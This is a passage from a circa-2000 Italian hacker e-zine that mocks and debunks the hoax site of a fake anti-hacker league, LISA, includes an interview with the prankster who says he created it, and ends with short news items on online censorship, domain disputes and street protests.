passa e non ci stancheremo mai di lottare fino allo stremo delle nostre forze
o fino a che uno di noi sara' ancora in vita.

(Sembra la presentazione di un CARTOON dei supereroi!)

Se distruggerete uno di noi due di noi ne prenderanno il posto.

(AIUUUUUTOOOOOOOOO!!!!! I Gremlins!)

Per ognuno di voi hacker distrutto sarete invece uno di meno.
Quello che vi manca e' l'organizzazione e noi l'abbiamo.
Abbiamo una sede -l'idirizzo della sede verra' inviato a tutti i soci che ne
faranno riciesta-

(Perche' non renderlo pubblico? Avete paura di pacchi bomba?)

Tutti quelli che faranno richiesta di entrare nella LISA verranno attentamente
vagliati sia da punto di vista informativo che dal punto di vista morale.
Non vogliamo rischiare che qualche spia degli hacker si intrufoli in mezzo a
noi e per questo abbiamo dalla nostra parte la polizia che ci aiutera' nel
farlo.
Se siete onesti non avete nulla da temere, se siete invece in mlafede sappiate che
vi aspettano dei giorni caldi se cercherete di truffarci dandoci dati
personali falsi.

Periodicamente publicheremo su tutti i newsgroup esistenti una lista di tutte
le persone che avranno cercato di intromettersi con le nostre attivita' e ne
daremo una copia ale forze dell'ordine perche' provvedano come da legge.

TanaDos L.I.S.A. member 0000

(Hanno bisogno di commenti??? IO mi convinco sempre di + che in realta' non
esista nulla....dove sono i nomi che dovevate fare??? Fino ad ora non ne ho
visto nemmeno uno!)

-[Hackers, Lamers, Crachers]-


(Le pagine sono ancora in costruzione, ma quelli del LISA vogliono cmq
lasciarci con una, anzi due perle...)

I Lamer sono come gli hackers ma
conoscono meno tecnicamente le
cose e quindi fanno meno danni.
Di solito sono studenti delle scuole
superiori metre gli hackers sono
laureati in informatica.

(Allora la maggiorparte dei tipi che conosco sono lamer....nuovo elemento per
identificare gli hackers....sono dottori in informatica! Per distruggere gli
Hackers, non si potrebbero arrestare tutti gli studenti delle facolta' di
informatica?)

I crachers sono hacker che vendono
i programmi falsificandone le copie
illegalmente.

(Quello che hai scritto tu non vuol dire nemmeno "Salatino" )

-[Link Hackers]-

Metto solo quelli italiani giusto per fare qualche piccola puntualizzazione:

LINK ITALIANI

PERICOLOSI !!!!

www.s0ftpj.org - Pubblicano dei file di testo che chiamano BFI
<Bastardi Fino In fondo>, non leggete questi file di testo perche' sono pieni
di virus che si installano nel computer mentre vengogo decompressati, sono dei
virus degli zip.


WWW.SPIPPOLATORI.COM - Sono pienei di backdoor e di virus. Attenzione a non
scaricare nessun loro programma, vi dicono che sono hackers-buoni ma il
motivo e' solo quello di invogliarvi a scaricare i loro programmi. La loro
rivista si chiama Netrunner e contiene virus e articoli per invogliare i
lettori ad aprirla.

WWW.DISLESSICI.ORG - Sono come gli spippolatori, forse peggio perche' usano
linux di preferenza. Fanno una rivista che si chiama Newbies e una volta
avevano messo anche delle foto su come scassinare le cabine telfoniche!!

(Piccolissimo errore di attribuzione riviste...)

WWW.UIC.CJB.NET - Chiamano loro stessi Universita' Italiana del Craching.
Ultimamente si sono fusi agli spippolatori e infatti potrete trovare il loro
nuovo sito sotto WWW.UIC-SPIPPOLATORI.COM sono capeggiati da un certe
Quaqquero (nome leggermente modificato sempre via delle ritorsioni) che dice
di essere il miglior crachers italiano. In effetti producono la quasi
totalita' dei crach in Italia e per questo li abbiamo denuciati piu' volte
alle forze dell'ordine che pero' non si sono mai mosse.

(1=non ho mai visto crack preparati dalla UIC, 2=Quequero [o forse QuaQquero?]
non ha MAI detto di essere il miglior cracker in italia....Leggere AiS per
credere ;-))) 3=Il vero URL e'http://quequero.cjb.net [al posto di
http://UIC.cjb.net]

Fanno una rivista che si chiama Wannabe ma io non ne ho mai vista una in rete,
secondo me per riceverla bisogna iscriversi su qualche chat che solo loro
usano e conoscono, cio' vi puo' far vedere quanto la cosa sara' illegale!

(A parte che c'e' stato un altro errore di attribuzione, ma chi l'ha detto che
per avere WannaBe bisogna iscriversi a qualche chat????? Mah, continuo sempre
di + a non capirci nulla...)

WWW.KR0ME.com - Dicono di essere americani e scrivono tutto in americano ma il
loro capo e' un certo Nords -anche questo nome e' stat modificato leggermente-
che tutto e' fuorche' americano!!!!


-[link sicurezza]-

(tralasciamo....)

-[NG Hackers]-
NG HACKER E IRC

Questi sono i posti dove potete trovarli!!!
Noi ci siamo SEMPRE anche se usiamo dei nick
diversi da quelli messi qui. Il controllo e' la cosa
migliore prima della cura!!!

(Si, come il dentifricio ed il dentista che mangia la mela e dice "Prevenire
e' meglio che curare!)

Newsgroup dove li potete trovare.

Vi avvertiamo in anticipo che e' meglio evitare di andare a postare qualcosa
su questi newsgroup perche' questa gente riesce a scoprire da i messaggi che
postate molto facilmente il posto da dove scrivete.

Non stiamo nemmeno a dirvi quanti virus e' facile predere ma vi ricordiamo che
ultimamente hanno inventato alcuni virus che si trasmettono direttamente via
newsgroup percui solo andando a leggere certi messaggi prestabiliti e'
possibile trovarsi il computer infettato da qualche backdoor o da qualche
programma di loro invenzione. Lasciate queste cose a noi che sappiamo come
muoverci le informazioni che riportiamo sotto dovranno essere prese solo per
sapere dove trovarli nel caso ce ne fosse bisogno per una denuncia.


(Uno si sveglia la mattina e fa:"mah oggi che faccio? Denunciamo qualche
hacker, ora vedo se in qualche NG qualcuno si fa volontario..." PATETICO!)

alt.bio.hackers

alt.2600

alt.dss.hack

alt.fan.tonya-harding.whack.whack.whack

alt.hack.tr

alt.hacker

alt.hackers

alt.hackers.cough.cough.cough

fido7.omni.nethack

free.italian.hackers

it.comp.hackers



Siti IRC dove li potete trovare.

#haccc

#hackers

#hacker.italia

#hackers.lamer.net

(Se permettete [PUBBLICITA' MANCO TANTO OCCULTA ;-))))] inserirei anche)

#aisprod

#area61

(fine pubblicita')

-[NG Sicurezza]-

NG SICUREZZA

Questi sono ng dove potete trovare persone
competenti che possono aiutarvi a combattere
la minaccia hacker. Molti di loro sono gia nostri
soci e molte delle informazioni che noi diamo
gratuitamente tramite la L.I.S.A. vengono gia usate
da loro come strumento per l'individuazione degli hacker.

Newsgroup sulla sicurezza
Fate comunque molta attenzione perche' anche qui si annidano gruppi di hacker
che si spacciano per esperti di sicurezza al solo scopo di fare amicizia con
voi per poi causarvi qualche danno!
Ricordate sempre che fidarsi e' bene ma non fidarsi e' meglio!!!

(Seh, ed una rondine non fa primavera....e non esistono + le mezze stagioni!)

it.comp.sicurezza.cert-it

it.comp.sicurezza.unix

it.comp.sicurezza.varie

it.comp.sicurezza.virus

it.comp.sicurezza.windows

-[Files]-

FILES

I programmi che vi servirebbe di conoscere per combattere
gli hackers. Nella lista non sono compresi per motivi di
segretezza i programmi di nostra produzione e che
vi daremo solo dopo l'inscrizione.

(Sono sempre + convinto del fatto che non esiste NULLA!)

Come prima cosa la LISA e' lieta di regalarvi questa guida di TanaDoS che vi
aiutera' se proprio di rete non ne capite niente tanto per cominciare.
La guida e' compressa con il programma zip quindi per leggerla dovrete prima
scomprimerla.

Se questo non vi risultera' facile potete scriverci al nostro indirizzo
di posta elettronica LISACLUBS@HOTMAIL.COM dandoci i vostri dati personali
reali!!!! -che noi controlleremo per evitare abusi- e vi spediremo la guida in
formato testo gia scompressa.

(Per un semplice winzip chiedere i dati personali??? Se avete problemi basta
usare winzip Wizard ed andare sempre avanti....)

PROGRAMMI CHE SONO GIA NEL VOSTRO COMPUTER

PING.EXE
Serve per sapere se il uno ha il computer attivo sulla rete.

TELNET.EXE
Questo e' il programma piu' usato dagli hacker quindi anche voi dovreste
imparare ad usarlo. Non e' semplice e per conoscere a fondo tutti i comandi
come noi vi servono i documenti in inglese tradotti in italiano che vi
forniremo gratuitamente dopo l'inscrizione.
Con questo potrete fare di tutto, proteggervi dagli attacchi e consultare le
banche dati.

(Cuoce anche un Bisonte in 45 secondi!)

NETSTAT.EXE
Serve per sapere se avete delle porte aperte da qualche backdoor sul vostro
computer.

Si puo' usare anche Nuckers Nabbers che lo fa meglio e protegge dalle
intrusioni.

(Ancora questo nukers nabber....ma che e'???????????)

Se volete sapere quali sono le porte che vi possono attaccare e come si fa
per chiuderle dovete leggere il file chiamato SERVICE che sta dentro dove
avete messo WINDOWS.
Li ci sono scritte tutte le porte dentro le quali gli hackers vi leggono l'hd.

(Altra fantastica spiegazione degna di cotanto gruppo)

NBTSTAT.EXE
Serve agli hackers per sapere se vi possono attaccare senza usare le backdoor.
Questo a voi pero' serve poco.

--------------------------------------------------------------------------------

PROGRAMMI CHE SONO GIA NEL VOSTRO COMPUTER SE AVETE LINUX
(se avete windows si trovano sul sito www.astalavista.box.sk)

NETCAT.EXE
E' come il telnet di windows pero' meglio. Si trovano tanti manuali in rete
su astalavista fatti ha hackers per cose illegali. Noi ve ne forniremo uno
fatto da noi che vi servira' invece per controbatterli.

Potete anche leggere i loro assieme ai nostri se sono cosi' stupidi da
pubblicare le loro tecniche perche' noi non dovremmo utlizzarli. Noi non
pubblichermo le nostre che useremo pero' ogni volta contro di loro quando se
ne presentera' l'occasione giusta.

(Non capisco...)

IPCHAIN.EXE
Questo serve per protervi dagli attacchi. Potete dire che un certo IP non deve
entrate nel vostro computer se non volete. L'equivalente per windows e' come
vi avevamo gia detto Nuckers Nabber.
Se avete linux con la distribuzione Redhat come me non c'e' pero' e va
installato dal compat disk di un altra distribuzione tipo la Mandrake.

(E tutta questa ignoranza perche' ti mancavano 2 esami alla laurea? Quali
erano quelli che ti mancavano "Accensione PC2" e "Autoexec.bat"?????)



PROGRAMMI DI DIFESA E DI CONTROATTACCO AGLI HACKERS:
-per questi dovete inscrivervi pero'-

(Consiglio vivamente un nukers nabber! ;-))

--------------------------------------------------------------------------------

TUTTI I PROGRAMMI CHE VI SERVONO VI VERRANNO FORNITI

GRATUITAMENTE!!!

(E le 35 karte di prima????)

SE VOI RITERRETE DI DOVERCI DARE QUALCOSA PER PERMETTERCI
DI CONTINUARE LE NOSTRE RICERCHE E PORTARE AVANTI LA NOSTRA
E LA VOSTRA LOTTA CONTRO GLI HACKER SARA' SOLO DI VOSTRA
INIZIATIVA. NOI NON VI CHIEDIAMO NULLA.


-[strumenti online]-

(Rippaggio generale....e per resatre in tema...)

-[ Lo Scrittore .html ]-

E' la vera chicca di questo sito, in cui il caro TanaDos ha totalmente RIPPATO
un homebuilder, ed ha cercato di camuffarlo [per esempio traducendo le varie
msgbox che comparivano dopo la pressione dei pulsanti]...anche se dopo' un po'
si e' stancato e ha lasciato i Msgbox in INGLESE...peggio di cosi'! :-))

-[Aiutateci!]-

AIUTATECI!

La L.I.S.A. e' uno strumento troppo importante perche'
possa morire per mancanza di fondi!!!

NOI PERO' NON VI CHIEDIAMO SOLDI!!!


a differenza di tutti gli altri che lo fanno in ogni occasione.
Noi siamo dei professionisti e non dei mercanti.
Se pero' vorrete darci un aiuto economico anche nel
vostro interesse lo potrete fare inviando un vaglia con un
vostro contributo al seguente conto corrente

CC - 238112/1248 intestato a

Mazzocconi P.I. Andrea

(Non esiste nessun Mazzocconi nelle zone di roma [il MSG di presentazione
postato su vari NG e' stato spedito da l]...uhm, qui gatta ci cova...)

Vanno bene anche mille lire se non avete altro perche'
l'importante non e' la somma quanto il gesto.
Avervi dalla nostra porte significa per noi fare numero
e aumentare le motivazioni che ci invogliano alla lotta.



Ringraziamo anticipatamente tutti quelli che vorranno
contribuire per quello che potranno.


-[Leggi]-

(LISTA DELLE LEGGI CON QUALCHE VARIAZIONE.....come come? echelon vi e' stato
messo a disposiziona dai pulotti e voi non lo utilizzate???? bene! meno male!)

-[Perche' sopprimerli]-
PERCHE' SOPPRIMERLI

Se avete letto questa pagina questo sito non fa per voi!!!
RIFLETTETECI SU'!!!

(Io sinceramente sto pensando per quale motivo sto ancora qui a scrivervi...)

-[Siamo nel giusto?]-

SIAMO NEL GIUSTO?

Vi rispondiamo in tutta onesta':
NOI PENSIAMO DI SI!

Ci siamo chiesti attentamente questa cosa tra di noi prima di mettere in rete
questo sito.
Non pensate che siamo gente senza scrupoli o senza un anima. Noi pensiamo di
essere nel giusto malgrado cio' dato che il nostro principale obbiettivo e'
rivolto al sociale vogliamo che chiunque di voi legge queste pagine si senta
libero di farci pervenire la sua opinione che sia esso un hacker o una persona
come le altre.

(Lo abbiamo constatato dalle flames di risposta che mandate...vedi AHCCC)

Per questo abbiamo un indirizzo postale lisaclubs@hotmail.com
dove scrivendoci riceverete comunque delle risposte educate qualunque siano i
vostri commenti.

(Vedi sopra)

Accetteremo di buon grado ogni vostro commento, aiuti per migliorare questo
sito e anche critiche.
Noi pero' indipendentemente da tutto continueremo la nostra lotta affinche'
la rete diventi un gionro un posto migliore dove vivere, questa consierazione
sia di aiuto a coloro che ci vorranno sostenere e di monito a tutti quelli
che ritengono gli altri solo merce per i loro giochi criminali.

(Mi ricorda vagamente un certo CAVALIERE....mUmBle MumBle...)


-[Sostenitori]-

IN FASE DI COSTRUZIONE.

Qui metteremo la lista di tutti coloro che ci sosterranno economicamente se
loro lo vorranno, altrimenti terremo i loro dati riservati e non saranno mai
usati per spam o altre cose illecite.

(Non verranno mai usate perche' non ci sono....)

Qui finisce il loro sitoweb....non so che dire, sono sconcertato, non vedevo
cose simili, e soprattutto non ridevo cosi' tanto da tempo...ma qui molte volte
si e' esagerato....ora io ho tre ipotesi da trarre:

1) Sono residuati del timone...

2) Sono tizi che tramite un po' di Social Enginering cercano di avere + info
possibili sulla gente....

3) E' tutto uno scherzo...

Questo articolo, oltre ad essere pubblicato su AiS2, e' stato spedito alla
mailbox di LISA....sperando in una risposta...

Un saluto a tutti, sperando di avervi fatto SBELLICARE dalle risate, e di
avervi fatto rendere conto quanta cacca c'e' ancora nella rete....

=] pArT Tw0 [=

-[NOOOOOOO, non e' possibile!!!!!!!! ]-

17/04/2000

Dopo aver perso quasi una domenica per scrivere l'articolo di sopra, mi
aspetta una bella SORPRESINA.......

Leggo sul newsgroup ahccc che la LISA era tutto uno scherzo, ideato e portato
avanti da Master degli SpiPPolatori...
Segue un intervista allo stesso Master fatta da me, con tutte i motivi che lo
hanno spinto a creare un "mostro" come la LISA...buon divertimento!


<0ld> =0ldir0n61
<Mas> =Master


<0ld> Dov'eri il giorno 15-04-00 intorno alle 11:42?????
OPS! niente scusa, ho sbagliato modalita' di interrogatorio, pardon
intervista! ;-)

<Mas> he he


<0ld> Ora si fa sul serio.......
1)Da quanto tempo meditavi un'uscita del genere???

<Mas> Da quando apparve in rete lo strampalato sito di Eduardo Freni analogo a
quello della Lisa anche se serio nei contenuti, "millantava"(secondo me)
troppi adepti e avrei vouto sin da subito fare una verifica personale..
i tempi non erano maturi allora.. oggi a quasi un anno di distanza si.
:)


<0ld> 2)Ma in realta' chi e' TanaDos? E perche' questo nome?

<Mas> TanaDos..."ti conosco da poco Dos" o anche "la morte del dos" .. insomma
un sistema come un altro per dichiarare la palese imbecillita' del
soggetto. :)


<0ld> 3)Cosa ti ha spinto a mettere su la LISA??? Quali erano i tuoi
obiettivi? Cosa volevi ottenere?

<Mas> Mi ha spinto una vita, da buon fiorentino, dedicata al cazzeggio e allo
scherzo pur se questo dovesse portar via tempo e fatiche alle piu'
remunerative attivita' lavorative per il sostentamento. :)
Cmq diciamo che c'era di base la voglia di dimostrare almenoun paio di
fatti importanti:
1. la prevenzione contro gli hacker e' una cosa spesso inspiegabile dai
piu' ma cio' nonostante molto tangibile.. i quasi cento "adepti" che
fino ad oggi avrebbero voluto accompagnare TanDos nella sua
purificazione della rete ne sono la dimostrazione.

2. La gente preferisce la devozione all'idiota ben pubblicizzato che
trascina verso il baratro dell'ignoranza piuttosto che seguire un
motivato idealista che proponga il ragionamento e la strada per la
salvezza. (Io chiamo questo: "il principio di Berlusconi")


<0ld> 4)Dopo la piccola avventura, conclusasi con la tua "confessione", quali
conclusioni sei riuscito a trarre???

<Mas> Principalmente che la realta' e' sempre peggio di quello che uno si
aspetta. Mi aspettavo infatti qualche risata, un certo
quantitativo di odio, molte insofferenze, un canestro della spesa di
offese, .. tutte cose normali.
Ho invece ricevuto come TanaDos complimenti per la mia preparazione e per
la battaglia che intendevo portare avanti,
offerte di collaborazione gratuita nei laboratori della Lisa, offerte di
materiale per il laboratorio, ecc..
Insomma pensavo di aver creato con TanaDos un pazzo deficiente e invece
mi sono accorto che poi in fondo non era certo peggio di tanti altri. :)))


<0ld> 5)Dici di aver ricevuto molte E-mail, sia di sostegno, che di
contestazione: in quale proporzione?

<Mas> allo stato attuale (tanti hanno continuato poi a scrivere anche dopo
l'ultimo aggiornamento con la 'confessione' perche'
probabilmente avevano letto il sito una sola volta o magari ne avevano
fatto un mirror e quindi non erano al corrente di tutta la faccenda)
Ci sono state mote centinaia di mail (non arriviamo al migliaio ma quasi!
:)) )... la percentuale di "devoti" fino all'aggiornamento si aggirava
sul 30% .. dopo e' ragionevolmente calata. In tutto ci sono state circa
una ottantina di persone diverse che seriamente mi hanno dato il
conforto della loro adesione.
Il peggio e' stato spiegargli "dopo" che era tutto falso e qualcuno
ancora non riesce a capirlo! :))


<0ld> 6)Cita qualche mail che ti ha colpito profondamente, sia in positivo che
in negativo.

<Mas> he he .. li vorrei citare tutti :))
Alcune mail sia votive che ingiuriose indipendentemente dalla loro
particolare categoria erano veramente poetiche , pero' c'e' una legge
sulla privacy e una legge non scritta sulla coscienza (ma che cmq io
rispetto) che non mi permette di farlo. :)


<0ld> 7)Alla storia della LISA, almeno io, ci sono cascato in pieno. Questo
perche' purtroppo gente del genere esiste (Ogni riferimento a cose,
persone, fatti realmente accaduti, ed oggetti NAUTICI, e' da
considerarsi quasi del tutto casuale...;-)) In base alle informazioni
che hai ottenuto grazie (o per colpa, fai tu) alla LISA, pensi che la
strada mancante alla TOTALE comprensione e distinzione dei termini
(Hacker, "Cracher", Lamer) sia ancora molta?

<Mas> praticamente non c'e' strada da percorrere. :) Gli hacker sono dei
delinquenti. Stop.
Alla gente non importa nulla delle varie definizioni, loro sentono il
telegiornale dove Lamberto Sposini che solitamente ha difficolta' a
memorizzare i numeri di telefono nel suo cellulare perche' l'uso dello
shift gli resta oscuro dice "gli hacker hanno rubato un camion di
prosciutti! La polizia ne ha arrestato uno che ha confessato : -stavo
troppo su internet e mi era venuta fame- " .. con queste notiziole ilari
ci fanno audience e il fatto che poi si vada a "spalmare" in giro per il
mondo un substrato di informazione non corrette poco importa.
Un tizio anni fa al Maurizio Costanzo Show, vero o falso che fosse
quello che diceva, sosteneva di essere stato arrestato per hacking in
Italia [ cosa strana perche' dagli anni 70 a oggi c'hanno arrestato solo
in 4 e ci conosciamo tutti! :)) ] cmq a parte cio' comincio' a spiegare
la differenza tra hacking etico e paranoid , tra lamer e hacker, la
funzione dei cracker, ecc..
La gente dormiva .. dopo tre minuti il conduttore sopito passo' a
Vittorio Sgarbi che si mise a offendere una insegnante poverella di
Ancona per una sua poesia che parlava di rami "divelti" e l'amico
hacker non si vide mai piu', Vittorio Sgarbi e' sempre in tlevisione..
parlar di cazzi rende piu' che parlare di protocolli di rete ovviamente.
:))



<0ld> 8)In puro stile RIDDLE, avevi lasciato qualche indizio che riportava a te
(No. CCP, link subdoli, etc.etc.)
Speravi che qualcuno ti "tanasse" (Tanto per restare in tema) prima che
tu confessassi tutto??????

<Mas> Ovviamente .. il bello sta proprio qui. Il sito farlocco deve portare
"la verita' dentro di se" nascosta in modo tale che il non vederla deve
essere motivo di riflessione tanto quanto il vederla.


<0ld> 9)Qualcuno ci e' riuscito?

<Mas> In casa SPP qualche manianco dei miei riddle .. Bhutta, Fritz, Brigante...
all'esterno tanti hanno detto che lo avevano capito sin da subito ..
pero' me l'hanno detto dopo. :))


<0ld> 10)Ma soprattutto, perche' l'hai fatta durare cosi' poco? Guardando i
posts su Ahccc la cosa poteva andare MOLTO, ma MOLTO per le lunghe...
come mai ti sei scoperto dopo appena 2gg.?????

<Mas> Come ho gia' detto se ricevevo solo insulti il sito "tanto per ridere"
poteva ancora esser li a svolgere la sua funzione
di faro per l'imbecillita' umana. E fra l'altro poteva essere anche una
sorta di vista -complice- per coloro che si potevano
ritenere sub-dotati tecnicamente .. infatti questi ultimi avrebbero
potuto sempre affermare "Guarda quelli .. rispetto
a loro io sono come Aleph1! " :))
Purtroppo la gente che voleva collaborare seriamente stava aumentando
oltre le mie capacita' di tenuta psicologica,
esattamente come vedere la morte o la sofferenza ti deprime cosi' a me
deprimeva vedere tanti poveracci ignoranti
ed angelici che cercavano di seguirmi pensando di essere i cavalieri
della tavola rotonda e di aver trovato il proprio re Artu'.
Sarei stato solo a capo di una mandra di deficienti .. per un
istante mi sono sentito come Bossi e ho preferito chiudere. :)) hi hi hi


Ringrazio Master degli Spp per la gentilissima collaborazione, anche se sono
ancora MOLTO OFFESO [ ;)) ], visto che ho perso una domenica (sottratta ai miei
sollazzi del week-end) per scrivere un'articolo che poi si e' rivelato inutile.
INUTILE???? mah alla fin dei conti niente e' inutile....... ;)))))))))))))))))

Ed adesso........AIS #2!!!!!!!!!!!!

---0ldir0n61----

-=!!!|-iN dIrEtTa dA dIsInf0-|!!!=-

Autore:

+--------------------------------------------+
/ >>>>> >>> >>>>> >>> > > >>>>>> >>>>> /|
/ < < < < < << < < < < /|
/ > > > >>>>> > > > > >>>> > > /|
/ < < < < < < < < < < < /|
/ >>>>> >>> >>>>> >>> > >> > >>>>> /|
+--------------------------------------------+|
||||||||||||||||||||||||||||||||||||||||||||||

DiSiNfO è una agenzia (dis)informativa autonoma, tenendo conto
che i media ufficiali dicono solo ciò che ci vogliono fare sapere,
ci proponiamo di aggiornarvi con notizie prese in giro, notizie
che i media ufficiali non pubblicano.

ATTENZIONE: "Questa edizione del telegiornare andra' in onda in
forma ridotta per venire incontro alle vostre capacita'
mentali" (frase celebre di Daniele Luttazzi)

A parte ogni scherzo, mi spiace comunicarvi che
l'edizione di DISINFO presente in questo numero e'
aggiornata solamente a gennaio ma, per motivi tecnici
non ho potuto dedicarmi agli aggiornamenti e, me ne
scuso. Vi prometto che non si ripetera' al prossimo
numero di questa e-zine.




+--- SiLeNzIo In ReTe ---+ ]22/11/1999[ CeNsUrA ]
La SIAE da diversi mesi ha chiesto e ottenuto da alcuni dei più importanti
siti italiani commerciali di musica, da Bollicine.IT a Vitaminic.IT, un
contratto di licenza, una "licenza sperimentale" che costa alcuni milioni
e che giustifica la distribuzione di clip musicali online.
Rockit, sito No-Profit gestito da appassionati, distribuisce brevissimi
brani di pezzi di rock italiano, sotto i 30 secondi di lunghezza e molto
spesso di autori poco conosciuti che non solo consentono ma chiedono
proprio di essere inseriti e ascoltati online. Ma, per usare le parole di
Rockit, "da questo momento il sito non e' più autorizzato a utilizzare
qualsiasi tipo di clip audio a meno di non versare alcuni milioni nella
casse della SIAE" La cosa rende ancora più urgente una presa di posizione
forte e univoca da parte di musicisti e stampa sulla liberta' di poter
utilizzare brevi campionamenti come fonte informativa, simile alla
citazione fra virgolette del testo, senza che chicchessia venga ad
accampare diritti assurdi.

InFo At: http://www.rockit.it/
http://www.punto-informatico.it/pi.asp?n=pi19991122ne001a.pin

TnX tO: Neural ------------> http://www.pandora.it/neural
Ferry Byte --------> http://strano.net/
Punto Informatico -> http://www.punto-informatico.it/

+--- CeNsUrA aNtI-nAzIsTi ---+ ]16/12/1999[ CeNsUrA ]
In Germania non si possono vendere "oggetti ricordo" dell'epoca nazista.
Il fatto che utenti internet tedeschi possano però acquistarli sulla rete,
sul sito di eBay, ha spinto il Simon Wiesenthal Center a chiedere ad eBay
di rimuovere certi oggetti messi all'asta sulle sue pagine. Non è la prima
volta che il Wiesenthal interviene per censurare il commercio di materiale
legato alla Germania nazista. Proprio il Wiesenthal, infatti, sembra sia
dietro la decisione di Amazon.com di impedire agli utenti tedeschi di
comprare la versione in inglese del Mein Kampf, il "testamento" di Adolf
Hitler. Stando alla lettera del Center a eBay, gli oggetti individuati
sulle pagine online della casa d'aste in alcuni casi "glorificano il
Nazismo". Pare che quelli del Wiesenthal facciano sul serio, tanto che nei
prossimi giorni chiederanno l'intervento del ministro della Giustizia
tedesco. eBay ha risposto affermando che la propria policy vieta la vendita
di questi oggetti in Germania ma che devono essere gli utenti a lamentarsi
perché il problema venga preso in considerazione dal management. Non solo,
sostengono a eBay, la casa d'aste non è responsabile se qualche utente
tedesco viola la legge del proprio paese. Di conseguenza eBay non ha
intenzione, per il momento, di impedire "tecnologicamente" la vendita degli
oggetti.

InFo At: http://www.punto-informatico.it/pi.asp?n=pi19991126ne014a.pin

+--- TeLeKoM eVoLuTiOn ---+ ]16/12/1999[ TeChNoLoGy ]
E' nata la 'cybercabina' una sorta di cabina telefonica dove, con una carta
prepagata, è possibile connettersi ad internet. E' stata installata presso a
Milano da Telecom Italia . La navigazione in rete costa 200 lire al minuto e
si paga con una comune scheda telefonica. Telecom ha intenzione di
installare nuovi punti di accesso in varie citta' nei luoghi dove maggiore è
il passaggio di persone, dalle stazioni agli aeroporti, dalle università alle
caserme.

InFo At: http://www.punto-informatico.it/pi.asp?n=pi19991216ne001a.pin
http://www.ansa.it/settori/internet/199912151304509850.html
http://www.flashnet.it/ansa/agenzia.php3?id=8632
http://www.asca.it/News/15143304.shtml

+--- Etoy vs eTOYS---+ ]23/12/1999[ HaCkTiViSm/CeNsUrA ]
Il sito in Apache corrispondente al dominio www.etoy.com è stato sospeso,
ed è attivo solo tramite il suo indirizzo di IP. Tutto per colpa dell'
azienda di giocattoli americana eToys che ha da tempo cerca di far
chiudere il dominio legato alle attivita' degli artisti austro-svizzeri Etoy
(divenuti famoso per l'operazione del digital hijack, il dirottamento digitale
descritto nel libro di Nico Piro, Cyberterrorismo), accusando gli artisti di
"dirottare" i consumatori a causa della quasi omonimia dei rispettivi domini.
La battaglia sta tirando dentro intere comunita' di hacker, gruppi di alternativa
digitale e organizzazioni per i diritti della rete come la EFF. A San Francisco
il gruppo ha fatto sapere di avere intenzione di contrastare gli abusi di eTOYS e
costituirsi per controbattere l'offensiva commerciale che sta cambiando il
volto e il significato della rete intera: "un gigante dell'ebusiness sta
mettendo a repentaglio l'esistenza di una compagnia di artisti... Questo caso
verte su chi ha il diritto di condurre business, operare, es

  
primersi ed esistere
nel cyberspazio". Noi -hanno spiegato altri difensori di etoy.com- vogliamo
semplicemente esistere come abbiamo fatto finora con un progetto artistico
creativo e importante. Non si può derubare l'identità di un artista. Etoy non è
eToys. Ma, signore e signori, ora si è tra l'incudine di una corporazione e il
martello di un tribunale. Il caso è effettivamente di interesse globale perché se
vincesse eToys, sostengono tutti gli intervenuti nell'incontro di San Francisco a
cui hanno partecipato i rappresentanti del gruppo di artisti, "si deciderebbe un
precedente per cui un artista può essere buttato fuori dalla rete, illegittimamente,
illogicamente e illegalmente" Il 29 novembre, con una sentenza-shock il giudice
John P. Shook, tribunale di Los Angeles, stabiliva in udienza preliminare (cioè
prima del dibattito vero e proprio) la sospensione del dominio www.etoy.com facendo
di fatto proprie le richieste dei legali della compagnia eTOYS che accusavano il
dominio di etoy di "inquinare la trasparenza del mercato". Una cosa che deve far
riflettere è che il dominio di Etoy esisteva dall'ottobre 1995 mentre quello della
corporation eTOYS solo dall'ottobre 1997. Prima della sentenza la compagnia aveva
offerto a Etoy 100.000 dollari per acquistarne il dominio. Etoy aveva respinto
l'offerta e si era preparato alla battaglia legale.

InFo At: http://www.punto-informatico.it/pi.asp?n=pi19991223ne001a.pin
http://146.228.204.72:8080/
http://www.toywar.com/
http://www.eviltoy.com/
http://rtmark.com/etoy
http://www.geocities.com/SoHo/Cafe/8541/toywar2.html

TnX tO: Neural ---------------------> http://www.pandora.it/neural
Punto Informatico ----------> http://www.punto-informatico.it/
Ferry Byte -----------------> http://strano.net/
Snafu ----------------------> mailing list cyber rights
Mondo Underground Webzine --> http://www.geocities.com/SoHo/Cafe/8541/

+--- BaTtAgLiA al CoRtEo RoMaNo ---+ ]15/01/00 [ MoViMeNtO ]
(CORRIERE DELLA SERA) - Scontri tra manifestanti e agenti di polizia,
ieri mattina, a un chilometro di distanza dal cancello d?ingresso del
centro di accoglienza per immigrati che è in località Ponte Galeria,
sulla via Portuense. La polizia ha caricato i partecipanti al corteo
che era stato organizzato per protestare contro le condizioni in cui
vivono gli extracomunitari. C'erano rappresentanti dei centri sociali di
Roma, di Milano e del Nord-Est e poi esponenti del partito della
Rifondazione comunista, dei Verdi e dei Cobas. E? pesante il bilancio
degli incidenti. I feriti, tutti non gravi, sono stati quattordici: otto
poliziotti, due carabinieri e quattro manifestanti.
I manifestanti, poco meno di un migliaio, avrebbero voluto far aprire il
loro corteo da un furgone Fiat Iveco, a bordo del quale - è
quanto riferiscono gli agenti - erano però stati caricati alcuni
pneumatici e una specie di grossa lancia, lunga quasi cinque metri: una
sorta di «ariete» che ai funzionari della questura ha subito ricordato
quello utilizzato lo scorso anno, in piazza della Repubblica, quando i
dimostranti, che chiedevano la libertà del leader curdo Ocalan,
assaltarono la sede delle linee aeree turche.
Le cariche delle forze dell'ordine sono state numerose e si sono
succedute dalle 11.30 alle 14. Il lancio di candelotti lacrimogeni è stato
fitto: come quello delle pietre, scagliate dai manifestanti. In
questura, le cariche sono state definite «azioni di contenimento», ma non
sono certo dello stesso parere alcuni parlamentari che, dopo aver preso
parte al corteo e aver assistito agli scontri, si sono poi recati in
questura, dove hanno incontrato il questore La Barbera.
I parlamentari Paolo Cento dei Verdi e Walter De Cesaris e Giovanni
Russo Spena di Rifondazione hanno espresso «formale protesta
per come è stato gestito l'ordine pubblico a Ponte Galeria».
Per i tre esponenti politici, «a Roma sono state sospese le libertà
costituzionali» e, per questo, hanno annunciato al questore La Barbera
che «al più presto, per fare luce su quanto accaduto durante una normale
manifestazione di protesta», verrà chiesto l?intervento del
governo».

+---CaSsOnEtTi In FiAmMe A NaPoLi---+ ]18/01/00 [ MoViMeNtO ]
(ANSA) - Tensione stamane in piazza a Napoli, dove da un corteo
autorizzato di lavoratori socialmente utili e disoccupati, si sono
staccati gruppi che hanno dato fuoco a numerosi cassonetti dei
